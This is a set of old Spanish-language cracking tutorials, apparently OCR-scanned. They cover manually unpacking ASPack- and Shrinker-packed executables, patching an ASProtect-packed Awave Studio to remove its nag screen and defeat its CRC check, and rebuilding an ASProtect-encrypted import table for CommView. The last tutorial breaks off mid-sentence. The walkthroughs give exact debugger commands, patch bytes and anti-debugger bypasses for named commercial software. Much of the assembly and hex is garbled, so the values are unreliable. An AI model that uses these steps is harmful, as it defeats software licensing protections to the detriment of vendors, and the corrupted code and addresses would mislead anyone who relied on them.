*** Poner un BPX aquí para saltar a la línea siguiente (BPX 015F:01017333) 
Pulsar ES 


Break due to BPX +015F:01017353 (ET=35.08 milliseconds) 
015F:01017353 MOV  EBX,[EBP+00444ADF] 

015F:01017359 OR  EBX,EBX 

015F:0101735B JZ 01017365 (JUMP ) 
015F:01017365 MOV  EDX,[EBP+004450AC] 

015F:0101736B MOV  EAX,[EBP+00444ADB] 
015F:01017371 SUB” EDX,EAX 

015F:01017373 JZ  010173EE (JUMP ) 
015F:010173EE MOV ESI[EBP+00444AEB] 

015F:010173F4 MOV - EDX,[EBP+004450AC] 
015F:010173FA ADD  ESLEDX 

015F:010173FC MOV EAX,[ESI+0C] 

015F:010173FF TEST EAX,EAX 

015F:01017401 JZ 01017544 (NO JUMP) 
015F:01017407 ADD” EAX,EDX 

015F:01017409 MOV  EBX,EAX 

015F:0101740B PUSH EAX 

015F:0101740C CALL  [EBP+00445194] 

015F:01017412 TEST EAX,EAX 

015F:01017414 JNZ  0101747D (JUMP ) 
015F:0101747D MOV DWORD PTR [EBX],00000000 
015F:01017483 MOV  [EBP+0044516E],EAX 

015F:01017489 MOV DWORD PTR [EBP+00445172],00000000 
015F:01017493 MOV  EDX,[EBP+004450AC] 

015F:01017499 MOV  EAX,[ESI] 

015F:0101749B TEST EAX,EAX 

015F:0101749D JNZ  010174A2 (JUMP ) 
015F:010174A2 ADD” EAX,EDX 

015F:010174A4 ADD EAX,[EBP+00445172] 

015F:010174AA MOV  EBX,[EAX] 

015F:010174AC MOV  EDI|[ESI+10] 


015F:010174AF ADD. EDI,JEDX 
015F:010174B1 ADD EDI [EBP+00445172] 
015F:010174B7 TEST EBX,EBX 


015F:010174B9 JZ  0101752C (NO JUMP) 
015F:010174BB TEST  EBX,80000000 
015F:010174C1 JNZ  010174C7 (NO JUMP) 


015F:010174C3 ADD EBX,EDX 

015F:010174C5 INC” EBX 

015F:010174C6 INC” EBX 

015F:010174C7 PUSH EBX 

015F:010174C8 AND EBX,7FFEFFEF 

015F:010174CE PUSH EBX 

015F:010174CF PUSH DWORD PTR [EBP+0044516E] 
015F:010174D5 CALL  [EBP+00445190] 

015F:010174DB TEST  EAX,EAX 

015F:010174DD POP. EBX 

015F:010174DE JNZ  0101751E (JUMP >) 
015F:0101751E MOV [EDI],EAX 

015F:01017520 ADD” DWORD PTR [EBP+00445172],04 
015F:01017527 JMP. 01017493 (JUMP >) 


*** Poner un BPX aquí para saltar a la línea siguiente (BPX 015F:0101752C) 
Pulsar ES 


Break due to BPX +t015F:0101752C (ET=33.17 milliseconds) 
015F:0101752C XOR EAX,EAX 

015F:0101752E MOV  [ESI],EAX 

015F:01017530 MOV  [ESI+0C]|,EAX 

015F:01017533 MOV  [ESI+10],EAX 

015F:01017536 ADD  ESI,14 

015F:01017539 MOV  EDX,[EBP+004450AC] 

015F:0101753F JMP  010173FC (JUMP ) 


*** Poner un BPX aquí para saltar a la línea siguiente (BPX 015F:01017544) 
Pulsar ES 


Break due to BPX +015F:01017544 (ET=2.62 milliseconds) 
015F:01017544 MOV  EAX,[EBP+00444AEF] 
015F:0101754A PUSH EAX 

015F:0101754B ADD  EAX,[EBP+004450AC] 
015F:01017551 POP. EBX 

015F:01017552 OR  EBX,EBX 

015F:01017554 MOV  [ESP+1C],EAX 

015F:01017558 POPAD 


015F:01017559 JNZ 01017563 (JUMP ) 
015F:01017563 PUSH FEAX  *** ¡Anotar el valor de EAX! 
015F:01017564 RET + ¡ ¡Parar aquí!!! 


Código largo, pero directo al grano. Hemos colocados varios breakpoints, 
como podéis ver en el código de arriba, para no atascarnos en los bucles. 


Aseguraos de anotar el valor de EAX (debería ser 010119E0). 


El último RET de arriba es el final del código del empaquetador. Para poder 
volcar el código completo del programa, tenemos que poner el código de desempaquetado 
en un bucle infinito. Para ello, teclead lo siguiente: 


aeip (pulsar enter) 
jmp eip (pulsar enter) 
(pulsar enter de nuevo) 


Ahora, pulsar FS para abandonar Soft-Ice. El programa está ahora desempaquetado en 
memoria, debido al bucle infinito que pusimos. Ahora podemos volcarlo siguiendo los 
estos pasos: 


1. Ejecutar Procdump. 

2. Hallar calc.exe en la lista "Tasks". 

3. Hacer click con el botón secundario sobre la tarea "calc.exe" y seleccionar "Dump (Full)". 
4. Guardar el programa con un nombre nuevo. 


Ahora podéis comparar los tamaños de los archivos, el empaquetado y el programa volcado. 
¡Vaya diferencia! 


Sin embargo, si intentáis ejecutar el programa volcado, no funcionará. ¿Por qué? 

¿Recordáis el valor de EAX que anotasteis? Se trata del OEP (Original Entry Point). 

Ejecutar ProcDump de nuevo y hacer click en el botón "PE Editor". 

Abrir el programa volcado. Necesitamos cambiar el "Entry Point" de 00017000 

a nuestro nuevo punto de entrada, que es el OEP menos la Base de la Imagen 

(010119E0 - 01000000 = 000119E0). Cuando hayáis cambiado el Entry Point, salir de Procdump 
y ejecutar de nuevo el programa volcado. ¡Funciona! 


NOTA: Como afirmé antes, no voy a entrar en detalles acerca de las funciones de los 
encabezamientos PE y su manipulación. No obstante, deberíais estudiarlas para entender 
completamente el desempaquetado. 


¡Enhorabuena! ¡Habéis conseguido desempaquetar un programa empaquetado con ASPack v1.08.03! 


Si tenéis cualquier pregunta, no dudéis en mandarme un e-mail a 
Volatility E ImmortalDescendants.com o volatility_id hotmail.com 


Eternal Bliss (por mostrarme el modo FACIL de salir de esos malditos bucles) 
Miz (por su EXCELENTE ensayo que hizo que me interesara por el empaquetado) 
Fravia+ (Por EL sitio que hizo me interesara por el reversing) 


Torn do, Lucifer48, Jeff, BJanes, MisterZ-, +Sandman, Lord Soth, alpine. 


Copyright (c) 1999 Volatility And The Immortal Descendants 
All Rights Reserved 


[ Predator's Cave ] 


YA QUE NO CREE UNA WEBPAGE, SOLO VERAS 
MI TUTORIAL AQUI, EN INLINE PATCHING ASPROTECTED APPS! 


perdon por la inconveniencia ;> 


**** ¡NLINE pATCHiNG A PROGRAM pACKED WiTH ASProtect (pArChEaR Un pRoGRAMa eMPAQUETADO 
CoN ASProtect)- Por Predator [PC/MED] - April 26, 2000 ****** 


Publicado por Tsehp April 2000 
Traducción de “*[G]oLe[E]* 


Si quieres descargar este tutorial en forma de texto, has click AQUI. (en Inglés). 


Oh sí, puede hacerse! Y en este texto tratare de explicar como. Antes que nada, dejame decirte que el creador de este 
enpaquetamiento es bastante listo (aunque no lo suficiente) y me tomo mucho tiempo antes de que pudiera terminarlo. Saludos 
a R!SC por ponerme en el camino correcto cuando me habia perdido, termine las cosas rapidamente despues de esto. AsProtect 
es una versión modificada de ASPack (el mismo creador) y ofrece un gran radio de compresión, chequeo de CRC y detección 
de SoftICE (jeje.. y la detección del SoftICE es aglo es algo que usaremos alegremente en este tutorial). Normalmente, si 
quieres parchear un objetivo dentro de la memoria (lee los excelentes tutoriales de R!SC acerca de este tema si no sabes que 
significa o si no sabes como hacerlo) puedes facilmente sobreescribir algo del código en el archivo y hacerlo saltar a tu parche. 
El problema con ASProtect es que usa 4 capas relocalizadoras. Mi primear idea de hacer un parche fue dejar que el programa 
parcheara todas las capas en memoria una a una, pero quedarias con horas y horas de trabajo y la pregunta es si el parche 
funcionara en todas las diferentes versiones de Windows (debido al direfente direccionamiento en cada versión). No, esa no es 
una buena solución. Entonces llegué a la conclusión de usar un Timer que se fija en el inicio del programa (el Punto de Entrada 
del programa) que chequeara cada milisegundo si el programa es desenpaquetado -> Si sí, entonces parchea y desactiva el 
timer, de lo contrario, continua. Bueno, traté pero no trabajo. La primera vez que la función del timer corre es despues que el 
programa es lanzado y las nags muestran su contenido... entonces es muy tarde para parchear. La siguiente idea, enganchemos 
algunas API con los procedimientos de desempaquetado, usar y dejar el punto para nuestro código de parcheo. Olvidalo, no 
trabajará ya que cada capa tiene una nueva dirección apuntando a la API y Shit... Entonces, qué nos queda? Que demonios 
podemos hacer con esta maldita ASProtect? te sorprenderas de cuan facil puede ser Parchear la memoria ¡NLiNe de un 
programa empaquetado con el. 


R!SC me dijo lo siguiete: El Punto de Entrada del Programa REAL del archivo, está -Fuertemente codificado- en el EXE que 
está en tu Disco Duro. Esto significa que puedes sobreescribir la dirección del PEP (PEP = Program Entry Point = Punto de 
Entrada del Programa) con la dirección de tu función parche y en la función parche despues de parchear, saltar al PEP. Pero 
aún queda el chequeo CRC. El dijo que no estaba seguro si tambien estaba -Fuertemente codificado- -> SILO ESTÁ! 
Entonces, que tenemos que conseguir aquí? esta es nuestra aproximación: 


1. Cambiar el Punto de Entrada del Programa en el archivo (con tu editor Hex) y cambialo a la dirección de tu función 
parche. 
2. La función parche hará esto: parchear el programa, entonces saltar al PEP real. 


3. Lanzar el programa, agarrar el NUEVO crc (despues los parches al archivo que he hecho) y escribelo al archivo de 
nuevo para que se actualice.. 


Y sí, TrAbAjA!! 


Objetivo: Awave Studio v7.0 
URL del Objetivo: http://www .fmjsoft.com/download/awave70.zip (como 670 kb) 


Protección: NAGS y similares (desactivaremos la nag) + Empaquetado con ASProtect 


Okas niñas (el okas es del traductor), aca vamos ;> Antes que nada, juntemos algo de información que necesitamos. 
Necesitamos antes que nada el PEP real y tenemos que hacerlo ir a la dirección de nuestro parche. Si corres Awave, veras que 
hay una detección de SoftICE. Entra al SICE -> bpx _lopen. Corre Awave de nuevo, veras que hay 2 llamadas a _lopen. Juega 
con estos 2 saltas y el chequeo de SoftICE será historia. Okas, ahora estamos cerca del PEP. Golpea F12 3 veces, y entonces 
reinicia el rastreo con F10. En un momento dado (ve cuidadosamente) verás este EAX=004A71E7. El programa hace un PUSH 
EAX y entonces un RET. Esto significa que solamente ira al PEP y ASProtect no hara nada nunca mas y el programa solo 
correra. Bien, nuestro PEP esta en 4A71E7. Busquemolo con nuestro editor HEX en awave.exe! Rapidamente notaras que si lo 
buscas por los bytes 4A71E7 que no los encontraras. Recuerdas que debes usar el order Invertido? Busca: E7 71 4A... Santos 
cielos, continua sin encontrar nada. Jeje... la cosa es que el archivo contiene el PEP - imagen base (por lo regular es 400000) 
asi que lo que queda: 4A71E7 - 400000 = A71E7. Y continuamos usando orden reverso, asi que esto es lo que tenemos que 
buscar (y esta vez si lo encontraras): E7 71 OA. MIEDO! Ahora podemos cambiar eso a la localidad de nuestro código parche. 
Yo usé el offset 320 (el cual será VA: 400320). Así que reemplazamos los bytes E7 71 OA con: 20 03 00. Ahora, si corres el 
programa, irá a la dirección 400320 en lugar de el PEP real! Y ahora que hacemos? ponemos el parche en el offset 320. No 
explicare como remover la nagscreen pero la encontré rápidamente, NOPea (hacer NOP) 2 bytes en la dirección 4644D9. Mi 
parche en el offset 320 se ve como esto (en HIEW): 


00000320 [66C705D94446009090 ¡mov w,[0004644D9],09090 (parche del programa) 
| (empujar el Punto de Entrada 
2 E7714A ¡push 0004A71E7 
00000329 68 00 ¡pus 000: AL del Prosmima) 


(Retornar al Punto de Entrada real 
del Programa) 


0000032E ca retn 


Okas, entonce lo que tenemos ahora es esto. Si corres el programa - imagina que ahora no hay chequeo CRC - ASProtect hará 
su trabajo desempacando y shit como esa y eventualmente saltara a nuestro parche en lugar del PEP. El parcher hará su trabajo 
en el código del programa y entonces va al PEP como si nada pasara. 


Como dije, imagina que no hay chequeo CRC. Pero como está, tenemos que vencerlo también. Si corrieras el programa ahora, 
el chequeo CRC te pateria los huevos (o los testiculos, para hacerlo mas entendible) :> Como dije antes, el CRC tambien esta 
fuertemente codificado en el EXE. Entonces tenemos que encontrar la comparación entre el CRC actual y el CRC que el 
archivo -DeBeRiA- tener y entonces, escribir el CRC actual al archivo (reemplazar la antigua). Entonces estamos libre y hemos 
vencido ASProtect! Okas, Ahora te preguntas donde demonios encontrarias el chequeo CRC? Bien, de nuevo entra a SoftICE y 
escribe bpx _lopen. Corre awave y juega con las flags para desactivar el chequeo del SICE. Presiona F12 solamente Una Vez y 
camina un poco. Verás una comparación entre EAX y EBP-8 (si no estoy mal). Lo divertido es que EBP-8 tiene el CRC que el 
archivo debe tener, y EAX tiene el CRC que tiene ahora. Escribelos, sal del SoftICE y AWAVE. HEXedita (abrir en el Editor 
HEX) Awave.exe de nuevo y busca los bytes (en orden inverso) del CRC original. El CRC original = 767583A8, entonces 
buscamos: A8 83 75 76. Jeje, serán encontrados. De allí sobrescribimos esos bytes (no olvides revertir el orden!) con el nuevo 
CRC. Para mi, el nuevo CRC era 533238D77 así que escribimos: 77 8D 23 53. Salimos de HIEW. Ahora, ya que no queremos 
ninguna sorpresa, corremos 1>FrogsICE para que no tengas que desactivar manualmente el chequeo del SoftICE. 


Corre Awave.exe, el programa correra y no mostrará la Nag, !!!! Tú (mejor dicho: Nosotros:) lo hicimos !!!! 
De nuevo, una protección ya hecha muerde el polvo. Tengo que admitir que esta no fue muy rapida, pero sabemos que no hay 
ninguna protección imposible de crackear y esto prueba bastante lo que pienso :-) 


Saludos: Bueno, especialmente agradezco a R!SC por ponerme en el camino correcto, pero por supuesto, tambien a todo la 
gente del Phrozen Crew y Manifest Destiny. No puedo olvidarme de mencionar a los Hardcore Crackers en 
ftcracking4newbies.. Ademas a toda la gente con la que me reuno en el IRC pero no mencionare nombres porque a los que 
accidentalmente olvide me patearian en los huevos por eso ;> 

Hiyaz a todos ustedes! 


Firmando, 


Predator [PC/MFD] 


Saludos a mi NuBeCiTa, LulsA TKM. 
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Detalles del programa: 
Nombre: Notepad.exe 


Herramientas usadas: 
ProcDump 

Softice 

Symbol Loader 


Método de Crackeo: 
Unpacking (desempacado) 


Método de Visualizar: 
Usar Notepad con el Word Wrap Encendido 
Fijar el area de la pantalla en 800 X 600 pixels (Opcional) 


Acerca de este sistema de protección 


Notepad.exe empaquetado con Shrinker v3.4 
Fin: Desempacarlo manualmente 


Acerca de este Tutorial 


Este es el primero de la serie de tutoriales de Desempaquetado SIMPLE que voy a 
escribir. El programa objetivo es notepad.exe, el cuál esta disponible en la mayoria de computadoras. Debido a que no soy muy bueno explicando algunas cosas en desempaquetado, solo puedo hacer mi mejor esfuerzo para mostrarte el método simple. 
Para métodos avanzados, deberas leer otros tutoriales. 


Hacer que SoftICE rompa el Punto de Entrada 
Abre el notepad.exe empacado en el Symbol Loader. 


Haz Click en el 2ndo icono del Symbol loader que dice 
"Load the currently open module" 


Obtendras un mensaje de erro y preguntara si quieres cargar el ejecutable de todas formas. 
Click en "Yes". 


Si SoftICE es cargado, irrumpira en el Punto de entrada del programa. 
Pero no lo rompio y el notepad.exe empacado se ejecuta a voluntad. 


Hora de cambiar las caracteristicas de las secciones... 
Cambiando las caracteristicas, harás que SICE comienze en el 
Punto de Entrada. 


Carga el notepad.exe empacado usando ProcDump (usando PE Editor) 
Verás esta ventana con "PE Structure Editor" como título. 


Haz Click en el botón llamado "Sections" 


Obtendrás otra ventana con "Sections Editor” como título. 


Verás las diferentes secciones del notepad.exe empacado. 


La primera sección es .shrink0 y sus caracteristicas son CO000082. 
Cambia las caracteristicas con un click izquierdo sobre .shrink0 y luego un Click derecho 
y elije edit section. 


Obtendrás otra ventana con 'Modify section value” como título. 

Cambia las caracteristicas de la Sección de COO00082 a E0000020. 

Mantente presionando OK hasta que regreses a la ventana principal de ProcDump. 
Puedes dejar el ProcDump por el momento. 


**A muchos como yo les gustaria explicar por qué esto es necesario, yo no puedo. 8P 
Podrias querer seguir leyendo sobre la Estructura PE para encontrar el por qué. 
De lo que dije, E0000020 hará la sección ejecutable y SoftICE 
Romperá en el Punto de Entrada. 


Encontrando el Punto de Entrada y Descargando 


Ahora, espero que no hayas cerrado el symbol loader. Si lo hiciste, abre el notepad.exe 
empacado y carga el ejecutable de nuevo. 


Cuando clickes en "Yes" esta vez, te encontraras en SoftICE... 
He pegado el siguiente código y los he comentado. 


O O) que ves en SICH veo ol os od os od oe ol os de oe ode ae od ole de ae ol le de le ol e 


**Estarás aquí cuando SoftICE entre. Mantente presionando F10 para rastrear a través del código. 


0041454F FFEF INVALID 

00414556 55 PUSH  EBP 

00414557 8BEC MOV  EBP,ESP 

00414559 56 PUSH  ESI 

0041455A 57 PUSH EDI 

0041455B 756B JINZ 004145C8 (NO SALTAR) 


0041455D 6800010000 PUSH 00000100 
00414562 E8D60B0000 CALLE 0041513D 


00414567 83C404 ADD — ESP,04 

0041456A 8B7508 MOV ESI[EBP+08] 

0041456D A3B4F14000 MOV [0040F1B4],EAX 
00414572 85F6 TEST  ESI,ESI 

00414574 7423 JZ 00414599 (SALTAR) 
00414599 33FF XOR — EDIEDI 

0041459B 57 PUSH EDI 


0041459C 893D8C184100 MOV [0041188C],EDI 

004145A2 FF1510224100 CALL  [KERNEL32!'GetModuleHandleA] 
004145A8 8BFO MOV. ESLEAX 

004145AA 68FF000000 PUSH  000000FF 

004145AF A1B4F14000 MOV EAX,[0040F1B4] 


004145B4 897D10 MOV [EBP+10],EDI 

004145B7 C7450C01000000 MOV DWORD PTR [EBP+0C],00000001 
004145BE 50 PUSH  EAX 

004145BF 56 PUSH  ESI 

004145C0 FF15F4214100 CALL [KERNEL32!GetModuleFileNameA] 
004145C6 EB03 JMP —  004145CB (SALTAR) 

004145CB ES30EAFFFF CALE 00413000 

004145D0 FF7510 PUSH DWORD PTR [EBP+10] 

004145D3 FF750C PUSH DWORD PTR [EBP+0C] 

004145D6 56 PUSH  ESI 


004145D7 ES806000000 CALL 004145E2 


**S1 rastreas sobre este CALL en 004145D7, el notepad.exe empacado 
se ejecutara libremente. Recargalo de nuevo usando el symbol loader si esto pasa. 


La próxima vez que llegues a este CALL, presiona F8 para rastrear dentro de él. 
Verás lo que está abajo. Haz un BPX en 004145D7 primero. 


004145E2 64A 100000000 MOV EAX,FS:[00000000] 


004145E8 55 PUSH  EBP 
004145E9 8BEC MOV EBP,ESP 
004145EB 6AFF PUSH FF 


004145ED 6810E04000 PUSH  0040E010 
004145F2 68EC5D4100 PUSH  00415DEC 


004145F7 50 PUSH  EAX 

004145F8 64892500000000 MOV  FS:[00000000],ESP 

004145FF 83EC14 SUB ESP, 14 

00414602 C745E401000000. MOV DWORD PTR [EBP-1C],00000001 
00414609 53 PUSH  EBX 

0041460A 56 PUSH  ESI 

0041460B 57 PUSH EDI 

0041460C 8965E8 MOV [EBP-18],ESP 

0041460F C745FC00000000 MOV DWORD PTR [EBP-04],00000000 
00414616 8B450C MOV EAX,[EBP+0C] 

00414619 83F801 CMP.—— EAX,01 

0041461C 7510 JNZ 0041462E (NO SALTAR) 


0041461E E886030000 CALL 00414949 

00414623 FF05C0F14000 INC DWORD PTR [0040F1CO0] 
00414629 ES82F6FFFF CALL 00413CBO0 

0041462E 8B35C0F14000 MOV ESI[0040F1C0] 


00414634 85F6 TEST  ESI,ESI 

00414636 0F848D000000 JZ 004146C9 (NO SALTAR) 
0041463C 833DC4F1400000  CMP DWORD PTR [0040F1C4],00 
00414643 7526 JNZ 0041466B (NO SALTAR) 
00414645 833D6417410000  CMP DWORD PYTR [00411764],00 
0041464C 741D JZ 0041466B (NO SALTAR) 


0041464E A164174100 MOV — EAX,[00411764] 
**EAX ahora será O0O0010CC 

00414653 030588184100 ADD — EAX,[00411888] 
**EAX ahora será 004010CC 

00414659 8945DC MOV [EBP-24],EAX 


**[EBP-24] ahora contendra 004010CC 


0041465C FF7510 PUSH DWORD PTR [EBP+10] 
0041465F FF750C PUSH DWORD PTR [EBP+0C] 
00414662 FF7508 PUSH DWORD PTR [EBP+08] 

00414665 FFS5DC CALL [EBP-24] 


**S1 rastreas este call, notepad.exe se ejecutará de nuevo. 
De arriba, desde que [EBP-24] = 004010CC, significa que el programa empacado 
es llamado 004010CC. Si rastreas en este call, tendrás a notepad.exe 
ejecutandose muy pronto. 


Si has rastreado a traves de mas programas empacados con shrinker v3.4 Siempre verás 
este "CALL [EBP-24]". Entonces, actualmente los programas estan yendo al Punto de entrada 
del programa desempacado. 


Recargar el notepad.exe empacado y una vez que irrumpas, puedes presionar FS y romperás 
en 004145D7 donde fijaste un bp antes. Rastrea dentro de él hasta 

que llegues a 00414665 donde el programa está a punto de ir al 

Punto de Entrada desempacado. 


Ahora escribe lo siguiente: 
a eip (y presiona Enter) 
]mp eip (y presiona Enter) 
FS 


Esto cambiará los códigos en 00414665. Notarás que despues de typear 

"¡mp eip" y presionar Enter, la introducción en 004146653 es ahora un ¡mp. 
Efectivamente esto hara que el programa se "pause". Presionar FS te permite 
retornar a Windows y puedes descargar el programa desempacado en tu Disco Duro. 


Usando ProcDump, da un click con el botón derecho en la primer lista y escoge "Refresh list". 
Busca el notepad.exe empacado y da un click derecho sobre él. 

Escoge "Dump (Full)" y grabalo. 

Da un click derecho sobre él de nuevo y escoge "Kill Task". 


Cambiando el Punto de Entrada 


Si recuerdas, el punto de entrada del notepad.exe desempacado es 004010CC. 
Usando la funcion PE Editor del ProcDump de nuevo, abre el notepad.exe desempacado. 


Bajo "Header Infos", verás que el Punto de Entrada es 0001454F, lo cuál 
es incorrecto. Si tratas de correr el notepad.exe desempacado sin cambiar 
el Punto de entrada, crasheara (entiendase se cerrara). 


Cambia el Punto de Entrada a 004010CC y haz click en "OK". 


Ahora, ejecuta el notepad.exe desempacado. 
Debe correr. 8) 


Notas Finales 
Este tutorial está dedicado a todos los newbies como yo. 
Mis gracias y gratitud van a: 
MIiZ de quien aprendi lo basico de desempacar. 


Todos los escritores de Tutoriales Crack y CrackMes 
y también a todos los crackers que han estado dando soporte a mi site y forum de proyectos. 
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Desempacando Manualmente Asprotect versión 2000 


La Tabla de Importación Encriptada 
Escrito por Tsehp 


Introducción | 


Asprotect es otro objetivo muy conocido, este empacador (packer) fue estudiado mucho y a menudo usado como un objetivo de practica 
para newbies. Si no sabes nada acerca de empacado, desarrolla tu conocimiento en los ensayos pasado, entonces regresa, tratare de 
explicarte los ultimos trucos. Acostumbro encontrar este objetivo cuando busco el msgboard del newbie de Sandman. Gracias a un 
reverser (cracker o revertidor) llamado SV que explicó bien la proteccion en sus terminos, su trabajo me salvo un monton de tiempo. 


Importante : Este ensayo puede brindarte una aplicación funcional con tu sistema actual, pero la Tabla de Importación no está 
reconstruida, así que si tienes que actualizar tu OS y cambian las direcciones de los dll's, no trabajará mas y tendras que hacer el 
proceso de nuevo. Actualmente estoy trabajando en otro ensayo para finalizar la reconstrucción de la Tabla de Importación. 


Herramientas requeridas | 


Softice 4.05 
Icedump 
Procdump 

Ida 4.04 

Un Editor Hex 


Ensayo hecho en win 2000, espera cambiar (adelante en este ensayo) algunas direcciones de Importación si estas trabajando en win 9x. 


URL/FTP del Blanco | 


http://www.tamos.com/ 
Este Commview 2.1, otro portsniffer. 


| Ensayo | 


1) Las Rutinas Anti-SoftICE 
Antes de lanzar esta aplicación, tienes que esconder tu debugger. Este programa usa 2 trucos tipicos Anti SoftICE: 
-Esta cargado el driver? : bpx createfileA haz un "d esp-4" 


Commview trata de ver si estan cargadas 3 versiones diferentes de SoftICE. Tienes que golpear 3 veces: 
SIWDEBUG 

SICE 

NTICE 


Bueno, dependiendo de tu Sistema, presiona F12 cada vez, el createfilea debe retornar Ox FFFFFFFE, si no, presiona F12 de nuevo y fija 
un eip a la dirección apuntada por el segundo ¡nz de abajo, pasaras todas las pruebas. 


-El Truco boundschecker. SICE usa int3 para sus breakpoints, pero cuando valores especiales son fijados para registrar, especialmente 
en ebp conteniendo 'BCHK' 0x4243484b, entonces si un int3 es encontrado, el manejador normal de interrupción retorna despues de 
este Int3 dentro de tu objetivo, así el código justo despues es ejecutado sí SICE está presente. Para evitar esto, presiona F10 varias veces 
despues de fijar tu eip, ve despacio a través del código hasta que veas el Int3 en SICE. Cuando estés allí, cambia tu ebp a algo mas que 
0x4243484b, entonces el programa correra normalmente hasta el último chequeo detectado por bpx createfilea, justo como arriba. 


Para el chequeo final, invierte el jz despues del createfileA, todas las pruebas están venciadas ahora. 


Nota : Tuve que hacer esto manualmente, porque frogsice no está implementado para win NT actualmente, la copia actual en NT 
llamada Ntall no es del todo funcional, así que no pude usar un device cargado para evitar esas manipulaciones. 


2) Localizando el Punto de Entradaa. 


Si quieres volcar tu programa empacado, debes para el objetivo aquí, para que todas las secciones sean cargadas. Tengo que admitir que 
usé directamente la tecnica que Eternal Bliss encontró en el forum de newbies. Aquí está, intacto: 


Steps: 
1) bpx en getprocaddress 
2) Una vez rompes, ve la sección .idata section con "dd 4E3000". Esto lo encuentras 


haciendo "map32 cv" 
3) bpm en el primer byte (Justo para romper allí) y desactivar el breakpoint en 
getprocaddress 
4) F5 y deja que el programa se ejecute 
5) Al romper, desactiva todos los breakpoints 
6) F12 4 veces y aterrizaras en un Xor EAX, EAX 
7) Comienza rastreando con F10 
8) Cada vez que encuentras un CALI, chequea que unas pocas instrucciones abajo sean JMP 
9) Si son, puedes rastrearlas 
10) Si es un ret, tienes que rastrear en ese CALL con F8 
11) Entonces para en los 2 CALL's subesecuentes 
12) Verás el OEP movido dentro de EAX en alguna parte 
13) Entonces te encontraras con un POPAD 
14) Las cosas del JMP aparecen otra vez como el inicio del código desempacado. 
15) Rastrea dentro del siguiente (3er) Call y F8 todo el camino hasta que llegues a un ret 
16) Continua así y aterrizaras en el OEP. 


Solo aplicalo y lo encontraras, 0x4de384 en mi sistema, solo recuerda que encontrarás 
Casi todo el tiempo una instrucción POPAD Justo antes del final del salto. 


Solo como ejercicio, puedes tratar de volcar el exe, usando IceDump y ProcDump para reconstruir el PE (esto no será explicado aquí, si 
no sabes como hacer esto, mira los ensayos de empacado/desempacado pasados). 


Tienes que copiar manualmente copiar hex la sección .aspr original a tu archivo volcado para continuar el ensayo, esta manipulación 
apenas replicará la Tabla de Importación a tu exe volcado, justo como el commview empacado. 


Pero esto no trabajará, solo trata de cargar tu exe volcado dentro de ida y notarás que la Tabla de Importación está dañada, algunas 
direcciones virtuales en otras secciones tambien están apuntando a direcciones erroneas. 


La principal protección de Asprotect está justo aquí: Algunas importaciones están bien, algunas otras están apuntando a un Tabla 
(localizada en mem en OxX0OCDxxxx) normalmente conteniendo algunas direcciones de importación desencriptadas y esta tabla 
originalmente también contiene algunas rutinas para desencriptar otras direcciones cuando commview las necesita, aún si este programa 
está desempacado. 


Bueno, aquí tenemos un gran problema: 
Puedes arreglar manualmente la Tabla de Importación si conviertes todas las direcciones de la tabla al .idata en el lugar correcto. 


Así dentro de tu aplicación volcada y dentro del .idata tienes 
4e328c : ¡mp [cd4950] y cd4950 conteniendo 77db858€ (una dirección de importación valida) 
Tienes que convertir el salto en 4e328c para apuntar directamente a 77db858e. 


Gastaras mucho tiempo, y no trabajará. Porque dentro de la tabla cdxxxx, algunas direcciones apuntan a código como este: 
cd4950 push cd495a 
call 182f68 (por ejemplo) 


Qué está pasando? Cuando commview hace el call 4e328c (Tabla de Importación) la rutina localizada en cd4950 solo desencripta la 
dirección de importación correcta EN TIEMPO DE EJECUCIÓN ! también puedes tratar la tabla cdxxxx, el código desencriptor 
continuara estando aquí y definiivamente no trabajando. Este rasgo es la mejora real hecha desde las últimas versiones de ASProtect. 


Para resumir, cuatro cosas diferentes le pasan a la Tabla de Importación: 4 casos 
diferentes en mi programa siguiente 

1- La dirección de la API es copiada directamente a .idata 

2- La dirección de la API es relocalizada en la Tabla Cxxxxx 

3- La rutina de desencripción es copiada a la Tabla Cxxxxx 

4- Una llamada indirecta a GetprocAddress (en la Tabla Cxxxxx) es copiada a .idata 


3) Preparando tu volcado 


Aun estas en la instrucción int3, haz un S O L FFFFFFFF AC 08 CO 74 EA y localizar el loop *culpable* de construir la tabla de 
importación, solo haz un bpmb en el inicio. 


Aquí está lo que encuentras: 


001B:0018A51E AC LODSB 
001B:0018A51F 08C0 OR AL, AL 
001B:0018A521 74E4 JZ 0018A507 
001B:0018A523  4E DEC ESI 
001B:0018A524 56 PUSH ESI 
001B:0018A525 53 PUSH EBX 
001B:0018A526 80F802 CMP AL, 02 


001B:0018A529 7407 JZ 0018A532 

001B:0018A52B 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 

001B:0018A52F 41 INC ECX 

001B:0018A530 EBO5 JMP 0018A537 

001B:0018A532 B904000000 MOV ECX, 00000004 

001B:0018A537 41 INC ECX 

001B:0018A538 01CE ADD ESI,ECX 

001B:0018A53A E8B5EDFFFF CALL 0018A2F4 <- redirecciona este punto, nota 
la dirección 0x18a2f4. 

001B:0018A53F AB STOSD 

001B:0018A540 EBDC JMP 0018A51E <- también nota esta dirección, 


es el salto de regreso al loop. 


Todo lo que tenemos que haces es encontrar una localidad de memoria libre, llena con O para que podamos escribir un pequeño código 
para modifica esta rutina. la dirección 0x190000 será usada como un ejemplo. 


Primero parcha 18a53a ¡mp 190000 


Entonces escribe el siguiente código en memoria con SoftICE: 


190000 call 18a2f4 ; Usamos un CALL legal 

190005 cmp ecx,40000000 ; ecx contiene una dirección API? 

19000b jle 19001c ; si no 

19000d add ecx,eax ; Si sí, convierte la dirección***caso 2 

19000f add ecx,5 ; a la dirección absoluta de API para una Tabla de Importación normal 
190012 mov dword ptr [edi],ecx ; ponerlo en una Tabla de Importación, apuntada por edi 
190014 add edi,4 ; actualiza edi a la siguiente importación 

190017 Jjmp l8a5le ; regresar a la normalidad 

19001c cmp ecx,0 ; es el caso 4? 

19001f 3z 19002e 

190021 cmp eax,40000000 ; eax contiene una dirección API? 

190026 jle 19003c ; si no, ir a 19003c 

190028 stosd ; estamos en el caso 1, copia directa de una dirección API valida en la T. 1. 
190029 jmp l8a5le ; regresa a la normalidad 

19002e push dword ptr [eax+1] ; esamos en el caso 3, empuja la dirección API encriptada 
190031 call 16df80 ¿IMPORTANTE 


Tienes que localizar esta dirección ASProtect haciendo un S 0 L FFFFFFFE 55 8b ec 81 c4 f8 fe ff ff 53 56 y encontramos como 
ejemplo 16df80, DEBES modificar el código en el offset 16df80+95 con tres nops (90), si no lo haces, este CALL generará un erro 13 
